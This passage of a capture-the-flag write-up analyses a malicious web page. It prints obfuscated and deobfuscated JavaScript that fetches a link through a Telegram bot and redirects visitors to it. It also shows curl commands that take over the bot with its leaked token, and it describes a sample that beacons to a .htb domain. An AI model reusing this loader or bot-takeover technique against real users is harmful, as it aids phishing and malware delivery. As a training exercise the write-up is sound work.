Array.prototype.slice.call(arguments), o = r.shift(); return r.reverse().map(function (r, t) { return String.fromCharCode(r - o - 7 - t) }).join('') }(43, 106, 167, 103, 163, 98) + 1354343..toString(36).toLowerCase() + 21..toString(36).toLowerCase().split('').map(function (r) { return String.fromCharCode(r.charCodeAt() + -13) }).join('') + 4..toString(36).toLowerCase() + 32..toString(36).toLowerCase().split('').map(function (r) { return String.fromCharCode(r.charCodeAt() + -39) }).join('') + 381..toString(36).toLowerCase().split('').map(function (r) { return String.fromCharCode(r.charCodeAt() + -13) }).join('') + function () { var r = Array.prototype.slice.call(arguments), o = r.shift(); return r.reverse().map(function (r, t) { return String.fromCharCode(r - o - 60 - t) }).join('') }(42, 216, 153, 153, 213, 187) };var _$_5975 = (function (o, u) { var g = o.length; var t = []; for (var w = 0; w < g; w++) { t[w] = o.charAt(w) }; for (var w = 0; w < g; w++) { var z = u * (w + 340) + (u % 19375); var a = u * (w + 556) + (u % 18726); var h = z % g; var q = a % g; var b = t[h]; t[h] = t[q]; t[q] = b; u = (z + a) % 5939310 }; var k = String.fromCharCode(127); var r = ''; var l = '\x25'; var i = '\x23\x31'; var v = '\x25'; var e = '\x23\x30'; var f = '\x23'; return t.join(r).split(l).join(k).split(i).join(v).split(e).join(f).split(k) })('%dimfT%mVlzx%degpatf5bfnrG%6tSiqth5at%easpi0emILmcim%e%/!=eZtnHf%e7cf+3rstO%%.D0i8p3t/Sphryoa%IL0rin%rcAeF6%nsenoYaLeQ5Natp4CrSrCGttUtZrdG%rlxe2poa2rdg=9fQs%&j_of0ButCO tb=r35DyCee8tgaCf=I=%rAQa4fe%ar0aonsGT_v/NgoPouP2%eoe%ue3tl&enTceynCtt4FBs%s/rBsAUEhradnkrstfgd?%t%xeyhcedeTo%olghXMsaocrB3aaDBr5rRa16Cjuct%cOee5lWE_ooo+Ka4%d3TysnehshstepId%%Ieoaycug:i_m=%%mjp0tgaiidoei.prn%sw1d', 4129280); function f(oferkfer, icd) { const channel_id = -1002496072246; var enc_token = _$_5975[0]; if (oferkfer === G(_$_5975[1]) && CryptoJS[_$_5975[7]](sequence[_$_5975[6]](_$_5975[5]))[_$_5975[4]](CryptoJS[_$_5975[3]][_$_5975[2]]) === _$_5975[8]) { var decrypted = CryptoJS[_$_5975[12]][_$_5975[11]](enc_token, CryptoJS[_$_5975[3]][_$_5975[9]][_$_5975[10]](oferkfer), { drop: 192 })[_$_5975[4]](CryptoJS[_$_5975[3]][_$_5975[9]]); var HOST = _$_5975[13] + String[_$_5975[14]](0x2f) + String[_$_5975[14]](0x62) + String[_$_5975[14]](0x6f) + String[_$_5975[14]](0x74) + decrypted; var xhr = new XMLHttpRequest(); xhr[_$_5975[15]] = function () { if (xhr[_$_5975[16]] == XMLHttpRequest[_$_5975[17]]) { const resp = JSON[_$_5975[10]](xhr[_$_5975[18]]); try { const link = resp[_$_5975[20]][_$_5975[19]]; window[_$_5975[23]][_$_5975[22]](link) } catch (error) { alert(_$_5975[24]) } } }; xhr[_$_5975[29]](_$_5975[25], HOST + String[_$_5975[14]](0x2f) + _$_5975[26] + icd + _$_5975[27] + channel_id + _$_5975[28]); xhr[_$_5975[30]](null) } else { alert(_$_5975[24]) } };;var sequence = [];;function l() { sequence.push(this.id); };;var _$_ead6 = ['\x69\x6E\x70\x75\x74\x5B\x63\x6C\x61\x73\x73\x3D\x63\x62\x5D', '\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C', '\x6C\x65\x6E\x67\x74\x68', '\x63\x68\x61\x6E\x67\x65', '\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72']; var checkboxes = document[_$_ead6[1]](_$_ead6[0]); for (var i = 0; i < checkboxes[_$_ead6[2]]; i++) { checkboxes[i][_$_ead6[4]](_$_ead6[3], l) }
Similarly, it can be deobfuscated with deobfuscate.io and some manual work. Skimming through the deobfuscated JavaScript, we can see that it is a generic function that involves sending requests to a Telegram bot. Fortunately, the bot token and encryption key was also hardcoded in the JavaScript.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
document.getElementById("newsletterForm").addEventListener("submit", function(e) {
e.preventDefault();
const emailField = document.getElementById("email");
const descriptionField = document.getElementById("descriptionField");
let isValid = true;
if (!emailField.value) {
emailField.classList.add("shake");
isValid = false;
setTimeout(() => {
return emailField.classList.remove("shake");
}, 500);
}
if (!isValid) {
return;
}
const emailValue = emailField.value;
const specialKey = emailValue.split("@")[0];
const desc = parseInt(descriptionField.value, 10);
f(specialKey, desc);
});
function f(oferkfer, icd) {
const channel_id = -1002496072246;
var enc_token = "nZiIj...[REDACTED]...Z0Q==";
if (oferkfer === "0p3r4t10n_4PT_Un10n" && CryptoJS.SHA256(sequence.join("")).toString(CryptoJS.enc.Base64) === "18m0oThLAr5NfLP4hTycCGf0BIu0dG+P/1xvnW6O29g=") {
var decrypted = CryptoJS.RC4Drop.decrypt(enc_token, CryptoJS.enc.Utf8.parse(oferkfer), {
drop: 192
}).toString(CryptoJS.enc.Utf8);
var HOST = "https://api.telegram.org" + "/" + "b" + "o" + "t" + decrypted;
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
const resp = JSON.parse(xhr.responseText);
try {
const link = resp.result.text;
window.location.replace(link);
} catch (error) {
alert("Form submitted!");
}
}
};
xhr.open("GET", HOST + "/" + "forwardMessage?chat_id=" + icd + "&from_chat_id=" + channel_id + "&message_id=5");
xhr.send(null);
} else {
alert("Form submitted!");
}
}
var sequence = [];
function l() {
sequence.push(this.id);
}
var checkboxes = document.querySelectorAll("input[class=cb]");
for (var i = 0; i < checkboxes.length; i++) {
checkboxes[i].addEventListener("change", l);
}
After decrypting the bot token, we can use it to interact with the Telegram bot using specific Telegram APIs. Using the getMe
API, the name of the Telegram bot can be identified as OperationEldoriaBot
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
const CryptoJS = require("./crypto-js");
function decryptToken(oferkfer) {
var enc_token = "nZiIj...[REDACTED]...Z0Q==";
var decrypted = CryptoJS.RC4Drop.decrypt(enc_token, CryptoJS.enc.Utf8.parse(oferkfer), {
drop: 192
}).toString(CryptoJS.enc.Utf8);
console.log("Decrypted Token:", decrypted);
return decrypted;
}
function debugDecryption() {
const testKey = "0p3r4t10n_4PT_Un10n";
decryptToken(testKey);
}
debugDecryption();
1
2
➜ curl "https://api.telegram.org/bot<DECRYPTED-TOKEN>/getMe"
{"ok":true,"result":{"id":xxx,"is_bot":true,"first_name":"OperationEldoriaBot","username":"OperationEldoriaBot","can_join_groups":true,"can_read_all_group_messages":false,"supports_inline_queries":false,"can_connect_to_business":false,"has_main_web_app":false}}
We will then use the forwardMessage
API to forward all the messages to our Telegran account. However, forwarding can only work if I have the chat ID between me and the Telegram bot. So, I can send a message to the Telegram bot and extract the chat ID using the getUpdates
API.
1
2
3
4
5
➜ curl "https://api.telegram.org/bot<DECRYPTED-TOKEN>/getUpdates"
{"ok":true,"result":[{"update_id":xxx,
"message":{"message_id":5635,"from":{"id":xxx,"is_bot":false,"first_name":"warlocksmurf","language_code":"en"},"chat":{"id":xxx,"first_name":"warlocksmurf","type":"private"},"date":1742737664,"text":"0p3r4t10n_4PT_Un10n"}}]}
➜ curl "https://api.telegram.org/bot<DECRYPTED-TOKEN>/forwardMessage?chat_id=xxx&from_chat_id=-1002496072246&message_id=1"
Incrementing the message_id
starting from 1, we can see that there were a total of 11 messages forwarded from the bot, most of them mentioned something about a malware that specifically targets Brave browsers.
The malware can be identified to be a .NET native executable. Hence, we opt to dynamic analysis since we could not find a tool to statically analyze it.
Credits to @Vivi’s_Ghost for helping us out in dynamically analyzing the malware. Essentially, running the malware with Brave browser installed will show network traffic on the malware attempting to be resolve to zolsc2s65u.htb
. Hence, by modifying /etc/hosts
with the hostname and docker IP, we can ensure the malware actually resolves to zolsc2s65u.htb
and perform the malicious action.
Once the hostname and docker IP was added, the malware can be seen sending a POST request with JSON data to a specific endpoint. However, the flag can instead be found in the JWT token within the POST request.